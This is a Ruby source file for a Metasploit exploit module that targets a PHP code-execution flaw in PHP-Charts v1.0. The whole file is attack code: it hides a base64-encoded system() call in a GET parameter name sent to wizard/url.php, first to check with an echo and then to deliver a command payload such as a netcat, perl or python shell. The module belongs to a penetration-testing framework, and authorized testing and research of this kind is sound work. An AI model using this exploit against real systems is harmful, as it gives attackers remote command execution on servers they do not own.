metasploit-gs/modules/exploits/unix/webapp/php_charts_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "PHP-Charts v1.0 PHP Code Execution Vulnerability",
      'Description'    => %q{
        This module exploits a PHP code execution vulnerability in php-Charts
        version 1.0 which could be abused to allow users to execute arbitrary
        PHP code under the context of the webserver user. The 'url.php' script
        calls eval() with user controlled data from any HTTP GET parameter name.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'AkaStep', # Discovery and PoC
          'bcoles' # msf exploit
        ],
      'References'     =>
        [
          ['OSVDB', '89334'],
          ['BID', '57448'],
          ['EDB',   '24201']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00\x0a\x0d\x22",
          'Compat'      =>
            {
            'PayloadType' => 'cmd',
            'RequiredCmd' => 'generic telnet netcat netcat-e perl ruby python',
            }
        },
      'DefaultOptions'  =>
        {
          'EXITFUNC' => 'thread'
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          ['Automatic Targeting', { 'auto' => true }]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jan 16 2013",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path to the web application', '/php-charts_v1.0/']),
      ])
  end

  def check

    base  = target_uri.path
    base << '/' if base[-1, 1] != '/'
    peer  = "#{rhost}:#{rport}"
    fingerprint = Rex::Text.rand_text_alphanumeric(rand(8)+4)
    code  = Rex::Text.uri_encode(Rex::Text.encode_base64("echo #{fingerprint}"))
    rand_key_value = rand_text_alphanumeric(rand(10)+6)

    # send check
    print_status("Sending check")
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri'    => "#{base}wizard/url.php?${system(base64_decode(\"#{code}\"))}=#{rand_key_value}"
      })

      if res and res.body =~ /#{fingerprint}/
        return Exploit::CheckCode::Vulnerable
      end
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      vprint_error("Connection failed")
      return Exploit::CheckCode::Unknown
    end
    return Exploit::CheckCode::Safe
  end

  def exploit

    base  = target_uri.path
    base << '/' if base[-1, 1] != '/'

    code  = Rex::Text.uri_encode(Rex::Text.encode_base64(payload.encoded+"&"))
    rand_key_value = rand_text_alphanumeric(rand(10)+6)

    # send payload
    print_status("Sending payload (#{code.length} bytes)")
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri'    => "#{base}wizard/url.php?${system(base64_decode(\"#{code}\"))}=#{rand_key_value}"
      })
      if res and res.code == 500
        print_good("Payload sent successfully")
      else
        fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed")
      end
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
        fail_with(Failure::Unreachable, "#{peer} - Connection failed")
    end

  end
end